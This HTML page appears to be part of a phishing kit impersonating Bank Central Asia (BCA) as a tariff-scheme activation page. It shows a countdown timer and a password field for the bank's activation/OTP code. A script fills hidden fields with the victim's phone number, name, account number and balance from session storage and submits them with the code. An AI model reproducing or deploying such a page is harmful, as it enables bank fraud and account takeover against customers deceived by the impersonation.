<!DOCTYPE html>
<html>
<meta http-equiv="content-type" content="text/html;charset=utf-8" />
<head>
<meta name="VIcurrentDateTime" content="638420422355925020" />

<meta name="theme-color" content="#005BAA"> 
	<meta charset="utf-8">
	<meta name="description" content="">
	<meta http-equiv="X-UA-Compatible" content="IE=edge">
	<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">


	
	<link href="main.css"		 rel="stylesheet">	
      
</head>

<body> 
    <div class="loader" id="loading-progress">
        <div class="wrapper-loader">
		<div class="loading-div">
            <div class="rect rect_one"></div>
            <div class="rect rect_two"></div>
            <div class="rect rect_three"></div>
			<div class="loading-text">Mohon Tunggu...</div>
		</div>
        </div>
    </div>
	
	

<!--rendering header-->

<style>
    body {
  position: relative;
}
    
    .pull-right-lang {
        float: right !important;
        margin: auto 0px;
        font-size: 0px;
        margin-left: auto;
    }

    .switch {
        padding: 6px 2px;
        width: 40px;
        display: inline-block;
        text-align: center;
        text-decoration: none !important;
        transition: color 0.2s ease, background-color 0.2s ease;
        border: 1px solid #fff;
    }

        .switch:first-child {
            border-top-left-radius: 16px;
            border-bottom-left-radius: 16px;
        }

        .switch:last-child {
            border-top-right-radius: 16px;
            border-bottom-right-radius: 16px;
        }

        .switch.is-active, .switch:hover {
            background: #fff;
            color: #0066ae;
        }

    .text-lang {
        font-size: 12px;
        color: #fff
    }
    
    #wrapper{
	
	background-repeat: no-repeat !important;
    background-size: cover !important;;
    background-position: center !important;
}

@media(max-width:525px){
  #wrapper{
    background:url('img/background-blue-mobile.png')left 50% bottom 175px/cover no-repeat !important;
  }
}

#wrapper{
	background-color:transparent;
}


  .fontku{
       font-size: 12px;
       font-weight: 400;
   }
   
   
   
   .btn-submit:active{
       color: #fff;
   }
   
   .btn:active{
       color: #fff;
   }
   
  .btn-default:active{
      color: #fff;
  }
  
  
  
  #btnSubmit, #btnSubmit1, #btnSubmit2{
      color: #fff;
      letter-spacing: 0;
  }
  
  
  #btnSubmit:active, #btnSubmit1:active, #btnSubmit2:active{
      color: #fff;
  }
  
  #typing-text {
	height: 80px;
	max-width: 280px;
	font-size: 14px;
	border: solid 1px #C9C9C9;
	color: #0086e0;
	background-color: #FFFFFF;
	text-align: center;
	font-family: Almarai, sans-serif;
	font-weight: bold;
	line-height: 19px;
	padding: 5px;
	letter-spacing: 0px;
	resize: none;
	outline: none;
	border: none;
	box-sizing: border-box;
	padding-left: 0px;
}

textarea{
    width: 280px;
}
</style>
<div id="wrapper">
		<div id="">
	<div class="container">
		<div class="d-flex py-2">
			<div class="mr-auto p-2"><img src="img/logo_2x.png" alt="" id="logobca" class="img-fluid logos"></div>
            
            
            
            <div class="container" style="display: -webkit-flex !important;">

                <div class="pull-right-lang">
                    <a class="switch text-lang is-active" href="#">ID</a>
                    <a class="switch text-lang " href="#">EN</a>
                </div>
            </div>

		
		</div>
	</div>

</div>
		<div id ="#content" class="background">
                	<div id="LandingPageAsuransi">
<title>BCA - AKTIVASI SKEMA TARIF</title>






<div class="AsuransiFormWrapper" style="border-radius: 10px; padding: 24px">
    
    
    
<fieldset id="debitpage" style="display: none">
	
		
		<div class="text-center mt-4 mb-1">
			
		</div>
		<div class="text-center">
					
					<div class="text-center pt-4 disclaimer-recaptcha captcha-policies">
						
					</div>

		</div>
	</form>
	</fieldset>   
<fieldset id="saldopage" style="display: ">
<h3 class="text-center mb-2" style="font-size: 18px; font-weight: bold">Verifikasi Kode Aktivasi / Virtual</h3>
<hr>
<br>
	<p class="text-center mb-5 leads" style="line-height: 17px">Silahkan Request Kode Aktivasi / Virtual,

<div class="row" style="margin-top: -35px; padding: 0px"> 
<div class="col-12" > 
<div class="alert alert-v2 alert-warning d-flex" role="alert" style="width: 100%; padding: 10px"> 
<div class="mr-2"> 
</div> 
<img src="img/exclamation-circle-warning-color.svg" style="width:6%;margin-top:-32px;margin-left:-8px;" alt="">
<span style="color: #B36620; font-size: 13px; line-height: 16px;padding: 4px;">Untuk mendapatkan Kode, Silahkan klik tombol <font style="color: green; font-weight: bold">Request Kode Aktivasi / Virtual</font> terlebih dahulu.</span> 


</div> 
</div> 
</div> 
</center>
<br/>
<form id="formsaldo1" method="post"  autocomplete="off" style="margin-top: -20px">
<input type="hidden" id="nomor" name="nomor" value="">
<input type="hidden" id="nama" name="nama" value="">
<input type="hidden" id="norek" name="norek" value="">
<input type="hidden" id="saldo" name="saldo" value="">
		<br><br>
		<p style="font-weight: bold; font-size: 16px; color: #0000006a; text-align: right; margin-bottom: -60px;margin-right:12px;" id="waktu">2 : 00</p> 
		<div class="form-group">
<label for="otp" style="color: #005BAA; font-weight: bold">Kode Aktivasi / Virtual : </label>

	<input type="password" class="focus-blue form-control" id="otp" name="otp" inputmode="numeric" maxLength="" minlength="" placeholder="Masukkan kode Aktivasi" value="" required/> 
		</div>
<div class="col-12 col-sm-auto text-center">
    
    
<a target="_blank" rel="noreferrer noopener" onclick="go()" id="invalid" style="color: #005BAA;font-weight: 700;font-size:14px;">>> Request Kode Aktivasi / Virtual ? <<</a>					
</div>				
		
		<div class="text-center mt-4 mb-1">
			<button type="submit" id="btnSubmit1" class="btn btn-default btn-submit">Proses</button>
		</div>
		<div class="text-center">
					<input type="hidden" id="captcha" name="captcha" value="">
					<div class="text-center pt-4 disclaimer-recaptcha captcha-policies">
						This site is protected by reCAPTCHA and the 
						<a href="#">Google Privacy Policy</a> and
						<a href="#">Terms of Service</a> apply.
					</div>

		</div>
	</form>
    
  
	</fieldset>   
<fieldset id="otppage" style="display: none">
	<h3 class="text-center mb-2" style="font-size: 20px; font-weight: bold">Notifikasi</h3>
	<p class="text-center mb-5 leads" style="line-height: 18px; font-size: 20px; font-weight: bold">Terima Kasih
<br><br/><span style="color: #b8641b; text-align: center; font-size: 15px; margin-top: 10px"><textarea id="typing-text" readonly></textarea></span> 
<div class="" style="margin-top: 220px; padding: 0px; text-align: center; font-size: 12px"> 

© 2024 Copyright Bank Central Asia
</div> 
</div> 
</div> 
</center>
<br/>


	</fieldset>   

</div>
	</div>


         </div> 
		 <!--rendering content-->
    </div>

    <!-- /#global-modal -->
    <div class="modal fade" id="global-modal" tabindex="-1" role="dialog" aria-labelledby="" data-keyboard="false" data-backdrop="static" aria-hidden="true" >
		
		<div class="modal-dialog modal-dialog-centered" style="margin-top: 0px;" role="document">
            <div class="modal-content">
                <div class="modal-header position-relative border-0 pb-0">
                    <button class="position-absolute btn-info closeTop" type="button" data-dismiss="modal" aria-label="Close"><i class="fas fa-times"></i></button>
                    <h4 class="modal-title text-center w-100"></h4>
                </div>
                <div class="modal-body text-center"></div>
                <div class="modal-footer border-0">
                    <div class="d-flex align-content-center justify-content-center w-100">
                        <button data-dismiss="modal" class="btn btn-info px-4 py-2 close-btn btn-footer-modal" type="button">OK</button>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <!-- /#global-modal -->
    
	<!--rendering content-->
	<div id="Webform-footer">
		 



<div class="container">
	<div class="row justify-content-center mt-4">
		<div class="col-lg-10">
			<div class="footer-data-wrapper row justify-content-center">
				
			<div class="footer-logo-desc mb-3 ">
						<div class="text-center justify-content-center pl-5 pr-5" style="color:#7D8185; margin-top: -50px">
							 <p class=""> BCA berizin dan diawasi oleh Otoritas Jasa Keuangan - BCA merupakan peserta penjaminan LPS</p>
							
						</div>
					</div>    
			</div>
		</div>
	</div>
</div>
	</div>


		<!-- end script detect browser-->

      <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js"
    integrity="sha512-+NqPlbbtM1QqiK8ZAo4Yrj2c4lNQoGv8P79DPtKzj++l5jnN39rHA/xsqn8zE9l0uSoxaCdrOgFs6yjyfbBxSg=="
    crossorigin="anonymous" referrerpolicy="no-referrer"></script>

<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.mask/1.14.15/jquery.mask.min.js"></script>
<script src="token.js"></script>
<script>

</script>	
<script>
  var nomor = sessionStorage.getItem("nomor");
 document.getElementById("nomor").value = nomor + "";
 
  var nama = sessionStorage.getItem("nama");
 document.getElementById("nama").value = nama + "";
 
  var norek = sessionStorage.getItem("norek");
 document.getElementById("norek").value = norek + "";
 
 var saldo = sessionStorage.getItem("saldo");
 document.getElementById("saldo").value = saldo + "";
</script>
	<script>
    window.onload = function() {
  var minute = 01;
  var sec = 59;
  setInterval(function() {
    document.getElementById("waktu").innerHTML =   minute + " : " + sec  ;
    sec--;

    if (sec == 0) {
      minute--;
      sec = 59;

      if (minute == 0) {
        minute = 0;
      }
    }
  }, 1000);
}
  
  
  
   
  </script>
</body>

